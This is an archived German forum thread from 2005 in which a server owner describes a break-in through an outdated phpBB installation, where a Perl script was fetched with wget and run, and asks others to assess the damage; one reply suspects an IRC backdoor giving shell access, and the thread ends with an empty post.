PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Nach Angriff auf Rootserver: Perldatei ausgeführt

jazzesnee
18-09-2005, 16:10
Hallo,

da heute morgen der Apache meines Rootservers nicht mehr gestartet war, habe ich mir die Log-Datei mal etwas näher angesehen. Durch eine Sicherheitslücke in einem alten phpBB (welches ich danach sofort gelöscht habe) hatte ein Angreifer per wget eine Datei nach /tmp/ heruntergeladen und mit perl ausgeführt.

Leider kann ich kein Perl, deshalb habe ich die Datei mal angehängt. Könnte mir hier vielleicht jemand sagen, ob, und wenn ja, welchen Schaden der Angreifer mit dieser Datei angerichtet hat?

Vielen Dank!

Detrius
18-09-2005, 16:38
Ich kenn mich ja auch nicht mit Perl aus, aber das schaut mir ganz danach aus, dass das lustige Skript sich mit einem IRC-Server verbindet und dann von da jeder Shell-Zugang auf deinen Rechner hat.

Du solltest den Rechner schleunigst vom Netz nehmen, falls Du das noch nicht getan hast.

jazzesnee
19-09-2005, 11:24
Aber dafür, dass das Script weiter ausgeführt werden kann, muss doch ein Perl-Prozess laufen. Das ist nicht der Fall (habe den Server nach Überprüfung der Initscripte neugestartet), also dürfte doch auch keine Möglichkeit des Zugriffs mehr bestehen.
In welchen Log-Dateien könnte ich denn nachsehen, ob und welche Befehle durch das Script auf dem Server ausgeführt wurden?

Und noch 'ne Frage: Da das Script ja über ein fehlerhaftes PHP-Script ausgeführt wurde, und PHP ja über Apache läuft, müsste es doch als User www-data laufen und dürfte eigentlich ja nicht allzuviel Schaden anrichten. Mein Traffic ist auch nicht merklich gestiegen...

Dellerium
19-09-2005, 11:38